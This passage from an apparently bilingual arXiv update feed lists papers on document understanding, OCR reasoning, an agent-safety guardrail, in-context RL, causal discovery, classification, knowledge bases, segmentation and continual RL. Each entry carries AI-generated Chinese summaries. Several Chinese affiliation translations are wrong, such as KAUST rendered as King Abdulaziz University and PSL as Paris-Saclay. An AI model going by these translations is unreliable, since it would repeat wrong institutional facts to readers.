wide range of tasks, including node classification, graph property prediction, long-range benchmarks, and spatiotemporal forecasting, demonstrating both its versatility and strong empirical performance.

2505.18603 2026-05-27 cs.AI cs.CV 版本更新

Doc-CoB: Enhancing Document Understanding with Visual Chain-of-Boxes Reasoning

Doc-CoB:通过视觉链式框推理增强文档理解

Ye Mo, Kai Ye, Xianwei Mao, Zirui Shao, Gang Huang, Bo Zhang, Hangdi Xing, Kehan Chen, Huan Zhou, Zixu Yan, Jiajun Bu, Sheng Zhou

发表机构 * Zhejiang Key Laboratory of Accessible Perception and Intelligent Systems, Zhejiang University(浙江可感知与智能系统重点实验室,浙江大学) Alibaba Group(阿里巴巴集团) Shanghai AI Laboratory(上海人工智能实验室)

AI总结 提出Doc-CoB框架,通过粗到细的布局感知视觉推理,结合多模态大语言模型,逐步聚焦查询相关布局区域,提升文档理解性能。

详情
AI中文摘要

文档理解旨在对文档图像进行问答和信息提取,其中视觉内容信息密集,大多数查询仅依赖于少数相关布局区域。然而,现有方法要么采用一次通过策略,隐式假设所有布局同等重要,要么过度关注小区域而丢失关键布局信息。为解决这些局限性,我们引入了Doc-CoB(链式框),一个简单而有效的框架,将粗到细的布局感知视觉推理集成到多模态大语言模型中。Doc-CoB不是直接放大到小区域,而是逐步聚焦于查询相关布局,同时保留全局文档信息。具体来说,它首先选择关键布局框,然后通过视觉提示聚焦于这些框进行进一步理解。为支持这一范式,我们引入了两个推理任务:框识别和框推理,并构建了一个自动流水线,生成24.9万个带有中间视觉监督的训练样本。在七个基准测试和四种流行模型上的广泛实验表明,Doc-CoB显著提升了性能,证明了其有效性和广泛适用性。

英文摘要

Document understanding aims to perform question answering and information extraction over document images, where the visual content is highly information-dense and most queries rely on only a few relevant layout regions. However, existing methods either adopt a one-pass strategy that implicitly assumes all layouts are equally important, or focus excessively on small regions at the cost of losing critical layout information. To address these limitations, we introduce Doc-CoB (Chain-of-Boxes), a simple-yet-effective framework that integrates coarse-to-fine layout-aware visual reasoning into multimodal large language models. Instead of directly zooming into small regions, Doc-CoB progressively focuses on query-relevant layouts while preserving global document information. Specifically, it first selects key layout boxes and then focuses on them for further understanding with visual prompting. To support this paradigm, we introduce two reasoning tasks for box recognition and box reasoning, with an automatic pipeline that constructs 249k training samples with intermediate visual supervision. Extensive experiments on seven benchmarks with four popular models show that Doc-CoB significantly improves performance, demonstrating its effectiveness and wide applicability.

2505.17163 2026-05-27 cs.LG cs.AI cs.CL cs.CV 版本更新

OCR-Reasoning Benchmark: Unveiling the True Capabilities of MLLMs in Complex Text-Rich Image Reasoning

OCR-Reasoning基准:揭示MLLMs在复杂文本丰富图像推理中的真实能力

Mingxin Huang, Yongxin Shi, Dezhi Peng, Songxuan Lai, Zecheng Xie, Lianwen Jin

发表机构 * South China University of Technology(华南理工大学) Huawei Technologies Co., Ltd(华为技术有限公司)

AI总结 提出OCR-Reasoning基准,包含1069个人工标注样本,覆盖6种核心推理能力和18个实际推理任务,通过双标注(最终答案和逐步推理过程)评估多模态大语言模型在文本丰富图像推理中的能力,发现最先进模型准确率均低于50%。

Comments ICLR 2026

详情
AI中文摘要

近期多模态慢思考系统在各种视觉推理任务中表现出色。然而,由于缺乏专门且系统的基准,它们在文本丰富图像推理任务中的能力仍未得到充分研究。为填补这一空白,我们提出了OCR-Reasoning,一个新颖的基准,旨在系统评估多模态大语言模型在文本丰富图像推理任务上的表现。具体而言,OCR-Reasoning包含1069个人工标注的示例,涵盖文本丰富视觉场景中的6种核心推理能力和18个实际推理任务。与仅提供最终答案的现有文本丰富图像理解基准不同,本基准额外提供了详细的逐步推理过程。这种双标注使得能够同时评估模型的最终答案和推理过程,从而全面评估文本丰富推理能力。利用该基准,我们对最新的多模态大语言模型进行了全面评估。结果表明,即使是最先进的多模态大语言模型在文本丰富图像推理任务中也面临巨大困难,在我们的基准上没有一个模型的准确率超过50%,这表明文本丰富图像推理的挑战是一个亟待解决的问题。基准和评估脚本可在https://github.com/SCUT-DLVCLab/OCR-Reasoning获取。

英文摘要

Recent advancements in multimodal slow-thinking systems have demonstrated remarkable performance across various visual reasoning tasks. However, their capabilities in text-rich image reasoning tasks remain understudied due to the absence of a dedicated and systematic benchmark. To address this gap, we propose OCR-Reasoning, a novel benchmark designed to systematically assess Multimodal Large Language Models on text-rich image reasoning tasks. Specifically, OCR-Reasoning comprises 1,069 human-annotated examples spanning 6 core reasoning abilities and 18 practical reasoning tasks in text-rich visual scenarios. Unlike existing text-rich image understanding benchmarks that only provide a final answer, this benchmark additionally provides a detailed step-by-step reasoning process. This dual annotation enables the evaluation of both the models' final answers and their reasoning processes, thereby offering a holistic assessment of text-rich reasoning capabilities. By leveraging this benchmark, we conducted a comprehensive evaluation of the latest MLLMs. Our results demonstrate that even the most advanced MLLMs exhibit substantial difficulties in text-rich image reasoning tasks, with none achieving an accuracy above 50\% on our benchmark, indicating that the challenges of text-rich image reasoning are an urgent issue to be addressed. The benchmark and evaluation scripts are available at https://github.com/SCUT-DLVCLab/OCR-Reasoning.

2505.11063 2026-05-27 cs.AI cs.CR 版本更新

Think Twice Before You Act: Enhancing Agent Behavioral Safety with Thought Correction

三思而后行:通过思想修正增强智能体行为安全

Changyue Jiang, Wenqi Zhang, Xudong Pan, Geng Hong, Min Yang

发表机构 * Fudan University, Shanghai, China(复旦大学,上海,中国) Shanghai Innovation Institute, Shanghai, China(上海创新研究院,上海,中国) Shanghai Pudong Research Institute of Cryptology, Shanghai, China(上海浦东密码研究院,上海,中国)

AI总结 提出Thought-Aligner,一种轻量级插件式安全模型,在动作执行前对不安全思想进行因果修正,无需修改底层智能体,通过两阶段对比学习训练,在多个基准和六种LLM上将行为安全从约50%提升至约90%,超越现有防护约23%,同时提升有用性约5%。

Comments Accepted to ICML 2026

详情
AI中文摘要

基于LLM的智能体通过迭代推理、工具使用和环境交互来解决复杂任务,其中每个中间思想直接塑造后续动作。因此,这些思想中的微小偏差可能传播为不安全行为,但现有的防护措施通常仅作用于最终输出或需要侵入式模型修改。我们引入了Thought-Aligner,一种轻量级插件式安全模型,它在动作执行前对不安全思想进行因果修正,而不改变底层智能体。修正后的思想被反馈给智能体,将其决策过程和工具使用引导至更安全的轨迹。由于仅在思想层面操作,Thought-Aligner是模型无关的,可以集成到各种智能体框架中。我们通过在十个风险场景中生成的成对安全和不安全思想上进行两阶段对比学习来训练Thought-Aligner。在多种智能体安全基准和六种LLM上的实验表明,Thought-Aligner将行为安全从无保护时的约50%提升至平均约90%,超过最先进的防护约23%,同时还将有用性提高了约5%。该方法具有低每步延迟和最小开销,实现了可扩展且实用的部署。我们在https://huggingface.co/WhitzardAgent/Thought-Aligner-7B公开发布了Thought-Aligner-7B。

英文摘要

LLM-based agents solve complex tasks through iterative reasoning, tool use, and environment interaction, where each intermediate thought directly shapes subsequent actions. Small deviations in these thoughts can therefore propagate into unsafe behaviors, yet existing guardrails typically operate only on final outputs or require intrusive model modifications. We introduce Thought-Aligner, a lightweight plug-in safety model that performs causal correction on unsafe thoughts before action execution, without altering the underlying agent. The corrected thoughts are fed back into the agent, steering its decision process and tool use toward safer trajectories. Because it operates solely at the thought level, Thought-Aligner is model-agnostic and can be integrated into diverse agent frameworks. We train Thought-Aligner via two-stage contrastive learning on paired safe and unsafe thoughts generated across ten risk scenarios. Experiments on diverse agent-safety benchmarks and six LLMs show that Thought-Aligner increases behavioral safety from about 50% without protection to around 90% on average, exceeding state-of-the-art guardrails by roughly 23%, while also improving helpfulness by about 5%. The method incurs low per-step latency and minimal overhead, enabling scalable and practical deployment. We publicly release Thought-Aligner-7B at https://huggingface.co/WhitzardAgent/Thought-Aligner-7B.

2502.17666 2026-05-27 cs.LG cs.AI 版本更新

Yes, Q-learning Helps Offline In-Context RL

是的,Q学习有助于离线上下文强化学习

Denis Tarasov, Alexander Nikulin, Ilya Zisman, Albina Klepach, Andrei Polubarov, Nikita Lyubaykin, Alexander Derevyagin, Igor Kiselev, Vladislav Kurenkov

发表机构 * Reinforcement Learning Journal(强化学习期刊)

AI总结 本文在离线上下文强化学习框架中整合RL目标,通过150多个数据集实验证明,直接优化RL目标相比算法蒸馏平均提升约30%性能,且价值学习中的保守性带来额外改进。

详情
AI中文摘要

现有的离线上下文强化学习(ICRL)方法主要依赖监督训练目标,这在离线RL设置中已知存在局限性。在本研究中,我们探索了在离线ICRL框架中整合RL目标。通过在150多个GridWorld和MuJoCo环境派生数据集上的实验,我们证明,与广泛采用的算法蒸馏(AD)相比,直接优化RL目标在各种数据集覆盖范围、结构、专业水平和环境复杂性下平均提升约30%的性能。此外,在具有挑战性的XLand-MiniGrid环境中,RL目标使AD的性能翻倍。我们的结果还揭示,在几乎所有测试的设置中,价值学习期间加入保守性带来了额外的改进。我们的发现强调了将ICRL学习目标与RL奖励最大化目标对齐的重要性,并表明离线RL是推进ICRL的一个有前景的方向。

英文摘要

Existing offline in-context reinforcement learning (ICRL) methods have predominantly relied on supervised training objectives, which are known to have limitations in offline RL settings. In this study, we explore the integration of RL objectives within an offline ICRL framework. Through experiments on more than 150 GridWorld and MuJoCo environment-derived datasets, we demonstrate that optimizing RL objectives directly improves performance by approximately 30% on average compared to widely adopted Algorithm Distillation (AD), across various dataset coverages, structures, expertise levels, and environmental complexities. Furthermore, in the challenging XLand-MiniGrid environment, RL objectives doubled the performance of AD. Our results also reveal that the addition of conservatism during value learning brings additional improvements in almost all settings tested. Our findings emphasize the importance of aligning ICRL learning objectives with the RL reward-maximization goal, and demonstrate that offline RL is a promising direction for advancing ICRL.

2407.15073 2026-05-27 cs.AI cs.CL 版本更新

Multi-Agent Causal Discovery Using Large Language Models

多智能体因果发现使用大型语言模型

Hao Duong Le, Xin Xia, Haijie Xu, Chen Zhang

发表机构 * Department of Industrial Engineering, Tsinghua University(清华大学工业工程系)

AI总结 提出多智能体因果发现框架MAC,通过元融合机制结合自主选择SCD算法的辩论编码模块和基于元数据的对抗性辩论模块,在多个基准上取得最优性能。

详情
AI中文摘要

因果发现旨在识别变量之间的因果关系,是各科学领域的基本问题。传统的统计因果发现(SCD)方法仅依赖观测数据,忽略元数据中可用的上下文信息,而近期基于LLM的方法利用元数据但将大型语言模型(LLM)视为单一智能体,使其判断易受记忆或偏见关联影响。为解决这一差距,我们引入MAC(多智能体因果发现框架),将因果发现转化为多智能体辩论与自主选择SCD算法相结合。MAC通过元融合机制桥接两个互补模块:辩论编码模块(DCM)通过自主选择并执行最合适的SCD算法将初始图基于数据,以及元辩论模块(MDM)通过对抗性的肯定-否定-裁判辩论基于元数据精炼图。在五个基准数据集和三个指标(F1、SHD、NHD)上,MAC在五个统计基线和四个基于LLM的基线中取得了最佳综合性能,在使用Gemini-2.0-Flash时在15个评估点中排名第一10次——包括完美重建地震图——并在三个骨干LLM上保持稳健。

英文摘要

Causal discovery aims to identify causal relationships between variables and is a fundamental problem across the sciences. Traditional statistical causal discovery (SCD) methods rely solely on observational data and ignore the contextual information available in metadata, whereas recent LLM-based methods exploit metadata but treat the large language model (LLM) as a single agent, leaving its judgments vulnerable to memorized or biased associations. To address this gap, we introduce MAC (Multi-Agent Causal Discovery Framework), which casts causal discovery as a multi-agent debate coupled with the autonomous selection of an SCD algorithm. MAC combines two complementary modules, bridged by a Meta Fusion mechanism: a Debate-Coding Module (DCM) that grounds an initial graph in data by autonomously selecting and executing the best-suited SCD algorithm, and a Meta-Debate Module (MDM) that refines the graph through an adversarial Affirmative-Negative-Judge debate over the metadata. Across five benchmark datasets and three metrics (F1, SHD, NHD), MAC achieves the best aggregate performance among five statistical and four LLM-based baselines, ranking first on 10 of 15 evaluation points with Gemini-2.0-Flash -- including a perfect reconstruction of the Earthquake graph -- and remains robust across three backbone LLMs.

2306.13985 2026-05-27 stat.ML cs.AI cs.LG stat.ME 版本更新

Robust Classification of High-Dimensional Data using Data-Adaptive Energy Distance

使用数据自适应能量距离的高维数据鲁棒分类

Jyotishka Ray Choudhury, Aytijhya Saha, Sarbojit Roy, Subhajit Dutta

发表机构 * Indian Statistical Institute , Kolkata, India(印度统计研究所,加尔各答,印度) School of Industrial and Systems Engineering, Georgia Institute of Technology , Atlanta, USA(工业与系统工程学院,佐治亚理工学院,美国亚特兰大) Computer, Electrical and Mathematical Sciences and Engineering Division, King Abdullah University of Science and Technology , Saudi Arabia(计算机、电子和数学科学与工程系,国王阿卜杜勒·阿齐兹大学科学与技术学院,沙特阿拉伯) Applied Statistics Unit, Indian Statistical Institute , Kolkata, India(应用统计部,印度统计研究所,加尔各答,印度) Department of Mathematics and Statistics, Indian Institute of Technology Kanpur , India(数学与统计系,印度理工学院坎普尔分校,印度)

AI总结 针对高维低样本量数据,提出无调参、无矩条件的鲁棒分类器,在渐近条件下实现完美分类,并通过模拟和真实数据验证其优势。

Comments Published at the European Conference on Machine Learning and Principles and Practice of Knowledge Discovery in Databases (ECML PKDD), 2023

详情
Journal ref
In: ECML PKDD 2023: Research Track. Lecture Notes in Computer Science, vol 14173. Springer, Cham (2023)
AI中文摘要

高维低样本量数据的分类在基因表达研究、癌症研究和医学成像等多种实际场景中构成挑战。本文开发并分析了一些专门为HDLSS数据设计的分类器。这些分类器无需调参且具有鲁棒性,即它们不依赖于底层数据分布的任何矩条件。研究表明,在相当一般的条件下,它们在HDLSS渐近框架下能实现完美分类。还研究了所提分类器的比较性能。我们的理论结果得到了广泛的模拟研究和真实数据分析的支持,这些分析表明所提出的分类技术相对于几种广泛认可的方法具有显著优势。

英文摘要

Classification of high-dimensional low sample size (HDLSS) data poses a challenge in a variety of real-world situations, such as gene expression studies, cancer research, and medical imaging. This article presents the development and analysis of some classifiers that are specifically designed for HDLSS data. These classifiers are free of tuning parameters and are robust, in the sense that they are devoid of any moment conditions of the underlying data distributions. It is shown that they yield perfect classification in the HDLSS asymptotic regime, under some fairly general conditions. The comparative performance of the proposed classifiers is also investigated. Our theoretical results are supported by extensive simulation studies and real data analysis, which demonstrate promising advantages of the proposed classification techniques over several widely recognized methods.

2003.05746 2026-05-27 cs.LO cs.AI cs.DB 版本更新

Querying and Repairing Inconsistent Prioritized Knowledge Bases: Complexity Analysis and Links with Abstract Argumentation

查询与修复不一致的优先知识库:复杂性分析与抽象论证的联系

Meghyn Bienvenu, Camille Bourgaux

发表机构 * CNRS & University of Bordeaux, France(法国国家科学研究中心与波尔多大学) DI ENS, ENS, CNRS, PSL University & Inria, Paris, France(巴黎高等师范学院(ENS)、法国国家科学研究中心(CNRS)、巴黎萨克雷大学(PSL University)与法国国家信息与自动化研究所(Inria))

AI总结 本文研究优先知识库中不一致性处理问题,定义了全局、帕累托和完成最优修复,分析了基于这些修复的查询蕴含、唯一最优修复存在性及枚举的数据复杂度,并揭示了最优修复与抽象论证框架扩展之间的关系。

Comments This is an extended version of a paper appearing at the 17th International Conference on Principles of Knowledge Representation and Reasoning (KR 2020). This version corrects the statement of Theorem 43 (missing hypothesis). 27 pages

详情
AI中文摘要

本文探讨了优先知识库(由本体、事实集和冲突事实间的优先关系组成)的不一致性处理问题。在数据库设置中,已研究了密切相关的场景,并定义了优先不一致数据库的三种不同最优修复概念(全局、帕累托和完成)。将这些全局、帕累托和完成最优修复概念迁移到我们的设置后,我们研究了核心推理任务的数据复杂度:基于最优修复的不一致性容忍语义下的查询蕴含、唯一最优修复的存在性以及所有最优修复的枚举。我们的结果为用常见DL-Lite方言表述的本体上这些任务的数据复杂度提供了近乎完整的图景。我们工作的第二个贡献是阐明了最优修复与(基于集合的)论证框架不同扩展概念之间的关系。在我们的结果中,我们展示了帕累托最优修复精确对应于稳定扩展(并且通常也对应于优先扩展),并提出了一种受基础扩展启发且具有良好计算特性的优先知识库新语义。我们的研究还产生了一些关于基于偏好的论证框架的独立兴趣结果。

英文摘要

In this paper, we explore the issue of inconsistency handling over prioritized knowledge bases (KBs), which consist of an ontology, a set of facts, and a priority relation between conflicting facts. In the database setting, a closely related scenario has been studied and led to the definition of three different notions of optimal repairs (global, Pareto, and completion) of a prioritized inconsistent database. After transferring the notions of globally-, Pareto- and completion-optimal repairs to our setting, we study the data complexity of the core reasoning tasks: query entailment under inconsistency-tolerant semantics based upon optimal repairs, existence of a unique optimal repair, and enumeration of all optimal repairs. Our results provide a nearly complete picture of the data complexity of these tasks for ontologies formulated in common DL-Lite dialects. The second contribution of our work is to clarify the relationship between optimal repairs and different notions of extensions for (set-based) argumentation frameworks. Among our results, we show that Pareto-optimal repairs correspond precisely to stable extensions (and often also to preferred extensions), and we propose a novel semantics for prioritized KBs which is inspired by grounded extensions and enjoys favourable computational properties. Our study also yields some results of independent interest concerning preference-based argumentation frameworks.

2404.18539 2026-05-27 cs.CV cs.AI 版本更新

Enhancing Boundary Segmentation for Topological Accuracy with Skeleton-based Methods

基于骨架的方法增强边界分割的拓扑准确性

Chuni Liu, Boyuan Ma, Xiaojuan Ban, Yujie Xie, Hao Wang, Weihua Xue, Jingchao Ma, Ke Xu

发表机构 * University of Science and Technology Beijing(北京科技大学) Beijing Advanced Innovation Center for Materials Genome Engineering(北京材料基因组创新中心) School of Intelligence Science and Technology(智能科学与技术学院) Shunde Innovation School(顺德创新学校) Institute for Advanced Materials and Technology(先进材料与技术研究院) Key Laboratory of Intelligent Bionic Unmanned Systems(智能仿生无人系统重点实验室) Institute of Materials Intelligent Technology(材料智能技术研究院) Liaoning Academy of Materials(辽宁省材料科学院) School of Materials Science and Technology(材料科学与技术学院)

AI总结 提出Skea-Topo Aware损失函数,通过骨架感知加权和边界修正项提升网状图像边界分割的拓扑一致性,在三个数据集上相比13种方法VI指标提升最多7点。

详情
Journal ref
Proceedings of the Thirty-Third International Joint Conference on Artificial Intelligence (IJCAI-24), pp. 1092-1100, 2024
AI中文摘要

拓扑一致性在网状图像的边界分割任务中起着关键作用,例如神经元电子显微镜图像中的细胞膜分割、材料显微图像中的晶界分割以及航拍图像中的道路分割。在这些领域中,分割结果的拓扑变化对下游任务产生严重影响,甚至可能超过边界本身的错位。为了增强分割结果的拓扑准确性,我们提出了Skea-Topo Aware损失函数,这是一种新颖的损失函数,考虑了每个物体的形状和像素的拓扑重要性。它由两部分组成。首先,骨架感知加权损失通过更好地利用骨架建模物体几何来提高分割准确性。其次,边界修正项通过使用真实标签和预测中的前景和背景骨架,有效识别并强调预测误差中的拓扑关键像素。实验证明,在三个不同的边界分割数据集上,基于客观和主观评估,我们的方法在VI指标上相比13种最先进方法将拓扑一致性提高了最多7点。代码可在https://github.com/clovermini/Skea_topo获取。

英文摘要

Topological consistency plays a crucial role in the task of boundary segmentation for reticular images, such as cell membrane segmentation in neuron electron microscopic images, grain boundary segmentation in material microscopic images and road segmentation in aerial images. In these fields, topological changes in segmentation results have a serious impact on the downstream tasks, which can even exceed the misalignment of the boundary itself. To enhance the topology accuracy in segmentation results, we propose the Skea-Topo Aware loss, which is a novel loss function that takes into account the shape of each object and topological significance of the pixels. It consists of two components. First, a skeleton-aware weighted loss improves the segmentation accuracy by better modeling the object geometry with skeletons. Second, a boundary rectified term effectively identifies and emphasizes topological critical pixels in the prediction errors using both foreground and background skeletons in the ground truth and predictions. Experiments prove that our method improves topological consistency by up to 7 points in VI compared to 13 state-of-art methods, based on objective and subjective assessments across three different boundary segmentation datasets. The code is available at https://github.com/clovermini/Skea_topo.

2009.11997 2026-05-27 cs.LG cs.AI cs.RO 版本更新

Continual Model-Based Reinforcement Learning with Hypernetworks

基于超网络的连续模型强化学习

Yizhou Huang, Kevin Xie, Homanga Bharadhwaj, Florian Shkurti

发表机构 * Division of Engineering Science, University of Toronto, Canada(多伦多大学工程科学系) Department of Computer Science, University of Toronto, Canada(多伦多大学计算机科学系)

AI总结 提出HyperCRL方法,利用任务条件超网络在序列任务中持续学习动力学模型,避免重新训练并固定存储开销,在机器人 locomotion 和 manipulation 任务中优于现有持续学习方法。

Comments Updated link to project website in the abstract. 7 pages (+2 pages in appendix), 8 figures. In proceedings of the 2021 IEEE International Conference on Robotics and Automation

详情
AI中文摘要

在基于模型的强化学习(MBRL)和模型预测控制(MPC)中,有效规划依赖于学习到的动力学模型的准确性。在MBRL和MPC的许多实例中,该模型被假定为平稳的,并且定期从头开始重新训练,使用从环境交互开始收集的状态转移经验。这意味着训练动力学模型所需的时间——以及计划执行之间的暂停时间——随着收集的经验规模线性增长。我们认为这对于终身机器人学习来说太慢,并提出了HyperCRL,一种使用任务条件超网络在序列任务中持续学习所遇到动力学的方法。我们的方法有三个主要特点:首先,它包括不重新访问先前任务训练数据的动力学学习会话,因此只需存储最近固定大小的状态转移经验;其次,它使用固定容量的超网络来表示非平稳且任务感知的动力学;第三,它优于依赖固定容量网络的现有持续学习替代方案,并且与记忆不断增长的过去经验核心集的基线方法相比具有竞争力。我们展示了HyperCRL在机器人 locomotion 和 manipulation 场景(如推和开门任务)中在连续基于模型的强化学习中的有效性。我们的项目网站(含视频)位于此链接:https://rvl.cs.toronto.edu/blog/hypercrl

英文摘要

Effective planning in model-based reinforcement learning (MBRL) and model-predictive control (MPC) relies on the accuracy of the learned dynamics model. In many instances of MBRL and MPC, this model is assumed to be stationary and is periodically re-trained from scratch on state transition experience collected from the beginning of environment interactions. This implies that the time required to train the dynamics model - and the pause required between plan executions - grows linearly with the size of the collected experience. We argue that this is too slow for lifelong robot learning and propose HyperCRL, a method that continually learns the encountered dynamics in a sequence of tasks using task-conditional hypernetworks. Our method has three main attributes: first, it includes dynamics learning sessions that do not revisit training data from previous tasks, so it only needs to store the most recent fixed-size portion of the state transition experience; second, it uses fixed-capacity hypernetworks to represent non-stationary and task-aware dynamics; third, it outperforms existing continual learning alternatives that rely on fixed-capacity networks, and does competitively with baselines that remember an ever increasing coreset of past experience. We show that HyperCRL is effective in continual model-based reinforcement learning in robot locomotion and manipulation scenarios, such as tasks involving pushing and door opening. Our project website with videos is at this link https://rvl.cs.toronto.edu/blog/hypercrl